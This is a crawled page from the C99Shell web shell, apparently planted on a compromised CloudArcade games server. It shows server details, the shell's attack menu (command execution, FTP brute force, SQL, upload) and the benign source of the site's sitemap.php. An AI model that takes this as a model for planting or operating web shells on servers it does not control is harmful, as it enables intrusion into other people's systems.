!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/gamesdaddy/cloudarcade/   drwxr-xr-x
Free 12.99 GB of 57.97 GB (22.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sitemap.php (1.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();
$username = isset( $_SESSION['username'] ) ? $_SESSION['username'] : "";
if ( !
$username ) {
    exit(
'logout');
}
include 
'config.php';
include 
'init.php';
if ( 
ADMIN_DEMO ) {
    exit(
'ADMIN DEMO');
}
if ( !
USER_ADMIN ) {
    exit(
'access forbidden!');
}
$str '<?xml version="1.0" encoding="UTF-8"?>
<urlset
    xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
    http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- generated by CloudArcade -->'
;

//domain
$str $str.'
<url>
    <loc>'
.DOMAIN.'</loc>
    <priority>1.00</priority>
</url>'
;
//categories
$cats get_all_categories();
foreach (
$cats as $cat) {
    if (
strpos($cat->slug'&') == false) {
        
$str $str.'
        <url>
            <loc>'
.get_permalink('category'$cat->slug).'</loc>
            <changefreq>weekly</changefreq>
        </url>'
;
    }
}
//games
$conn = new PDO(DB_DSNDB_USERNAMEDB_PASSWORD);
$conn->setAttribute(PDO::ATTR_ERRMODEPDO::ERRMODE_EXCEPTION);
$sql "SELECT slug FROM games";
$st $conn->prepare($sql);
$st->execute();
$games $st -> fetchAll();
$conn null;
foreach (
$games as $game) {
    if (
strpos($game['slug'], '&') == false) {
        
$str $str.'
        <url>
            <loc>'
.get_permalink('game'$game['slug']).'</loc>
        </url>'
;
    }
}
$str $str.'</urlset>';

$sitemap fopen("sitemap.xml""w") or die("Unable to open file!");
$content $str;
fwrite($sitemap$content);
fclose($sitemap);

header('Location: sitemap.xml');

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--